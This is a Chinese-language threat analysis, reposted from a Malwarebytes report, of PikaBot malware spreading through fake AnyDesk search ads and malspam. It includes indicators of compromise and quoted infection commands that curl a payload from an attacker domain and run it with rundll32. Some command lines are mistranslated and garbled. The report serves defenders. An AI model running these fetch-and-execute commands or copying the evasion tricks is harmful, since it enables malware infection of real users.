深度分析PikaBot如何通过恶意搜索广告实现大规模传播和入侵感染

## 写在前面的话

在过去的2023 年，Malwarebytes 实验室的研究人员发现，通过恶意广告进行的网络攻击数量有所增加，特别是通过搜索引擎针对企业组织的攻击。如果算上社会工程活动，基于浏览器的攻击活动数量大幅增加。

网络犯罪分子经常通过搜索广告感染新的目标用户。研究人员认为，目前社区或暗网市场中有专门的服务可以帮助恶意软件传播者和网络犯罪组织绕过谷歌的安全措施，帮助他们构建攻击诱饵基础设施。

在本文中，我们将分析名为PikaBot 的恶意活动，并提供与该活动相关的详细信息和入侵威胁指标IoC。这是2023年出现的新恶意软件家族。PikaBot目前主要通过恶意广告实现大规模感染和入侵。值得一提的是，PikaBot现已成为网络犯罪组织TA577的首选负载之一。

## PikaBot 与恶意垃圾邮件的关联

早在2023 年2 月，Unit 42 的研究人员就发现并识别了PikaBot 的活动。当时，PikaBot 主要通过恶意垃圾邮件活动传播，并由Matanbuchus 恶意软件传播和感染。

随着QakBot 僵尸网络于2023 年8 月退役，Cofense 研究人员观察到，传播DarkGate 和PikaBot 的恶意垃圾邮件活动有所增加。 ikaBot 的典型分发链通常以一封包含外部网站链接的电子邮件（被劫持的线程）开始，并诱骗目标用户下载包含恶意JavaScript 文件的ZIP 存档：

然后，恶意JavaScript文件将在目标设备上创建随机目录结构，并使用curl工具从外部网站获取并下载恶意负载：

````

\'C:\\Windows\\System32\\cmd.exe\' /c mkdir C:\\Gkooegsglitrg\\Dkrogirbksri curl https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --output C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

````

````

卷曲https://keebling[.]com/Y0j85XT/0.03471530983348692.dat --输出C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll

````

接下来，该脚本将通过rundll32执行Payload（一个DLL文件）：

````

rundll32 C:\\Gkooegsglitrg\\Dkrogirbksri\\Wkkfgujbsrbuj.dll，输入

````

据OALbas 研究人员称，恶意脚本随后将PikaBot 的核心模块注入合法的SearchProtocolHost.exe 进程中。此外，PikaBot的加载程序还通过使用间接系统调用来隐藏其注入行为，以增加感染的隐蔽性。

## PikaBot 通过恶意广告传播感染

本次活动主要针对Google搜索中的远程应用AnyDesk。研究人员在分析PikaBot 的分发链后发现并确定，该活动的最终有效负载是PikaBot。

此外，研究人员还在另一则冒充AnyDesk 品牌的恶意广告中发现了该活动：

点击恶意广告后，用户将被重定向到预设的诱饵网站（anadesky\\[.\\]ovmv\\[.\\]net）：

单击下载按钮后，将下载一个经过数字签名的MSI 安装程序。需要注意的是，在分析有效负载时，VirusTotal 上的检测结果为零。不过，更有趣的是实现检测绕过的方法：

JoeSandbox的研究人员总结了PikaBot的完整攻击流程如下图：

## 类似于FakeBat 的恶意广告活动

威胁参与者一直在尝试使用合法的广告营销平台和跟踪URL 来绕过Google 的安全检查，并将目标用户重定向到Cloudflare 中托管的自定义域：

恶意攻击者现在将通过JavaScript 执行指纹识别，以确定目标用户是否处于虚拟机环境中。检测完成后，目标用户将被重定向到主登录页面，即诱饵AnyDesk网站。

有趣的是，当用户单击下载按钮时，会进行第二次指纹识别尝试，很可能是因为攻击者需要再次确保下载链接在虚拟化环境中不起作用。在此活动中，攻击者使用Dropbox 托管恶意MSI 安装程序。

研究人员还发现，PikaBot之前的恶意广告攻击链也使用了相同的重定向机制（域名onelink\\[.\\]me）。这些攻击当时主要针对Zoom 和Slack 搜索广告，已向Google 报告：

## 总结

在此之前，许多恶意软件主要通过浏览器插件漏洞进行传播。但随着安全漏洞不断得到修复，威胁行为者已将注意力转向垃圾邮件和恶意广告。结果，恶意广告成为另一个强大的感染媒介。

在本文中，我们分析了PikaBot 的恶意活动，并提供了与此活动相关的详细信息和入侵威胁指标(IoC)。企业组织和个人用户在搜索和点击任何广告内容时应谨慎行事，以确保最终用户访问的内容来自可信来源。

## 入侵威胁指标IoC

### 恶意域名

````

阿纳德斯基[.]ovmv[.]net

CXTENSON[.]顶部

Dropbox 有效负载

dropbox[.]com/scl/fi/3o9baztz08bdw6yts8sft/Installer.msi?dl=1rlkey=wpbj6u5u6tja92y1t157z4cpq

dropbox[.]com/scl/fi/p8iup71lu1tiwsyxr909l/Installer.msi?dl=1rlkey=h07ehkq617rxphb3asmd91xtu

dropbox[.]com/scl/fi/tzq52v1t9lyqq1nys3evj/InstallerKS.msi?dl=1rlkey=qbtes3fd3v3vtlzuz8ql9t3qj

````

### PikaBot 哈希

````

0e81a36141d196401c46f6ce293a370e8f21c5e074db5442ff2ba6f223c435f5

da81259f341b83842bf52325a22db28af0bc752e703a93f1027fa8d38d3495ff

69281eea10f5bfcfd8bc0481f0da9e648d1bd4d519fe57da82f2a9a452d60320

````

### 皮卡机器人C2

````

172[.]232[.]186[.]251

57[.]128[.]83[.]129

57[.]128[.]164[.]11

57[.]128[.]108[.]132

139[.]99[.]222[.]29

172[.]232[.]164[.]77

54[.]37[.]79[.]82

172[.]232[.]162[.]198

57[.]128[.]109[.]221

````

##参考文献[https://twitter.com/Unit42\\_Intel/status/1623349272061136900](https://twitter.com/Unit42_Intel/status/1623349272061136900) [https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware](https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware) [https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/](https://cofense.com/blog/are-darkgate-and-pikabot-the-new-qakbot/) [https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastruct-in-multinational-cyber-takedown](https://www.fbi.gov/news/stories/fbi-partners-dismantle-qakbot-infrastruct-in-multinational-cyber-takedown) [https://www.joesandbox.com/analysis/1362406/0/html](https://www.joesandbox.com/analysis/1362406/0/html)

## 参考链接[https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads](https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads) 转载自freebuf： [https://www.freebuf.com/articles/web/389305.html](https://www.freebuf.com/articles/web/389305.html)作者：FreddyLu666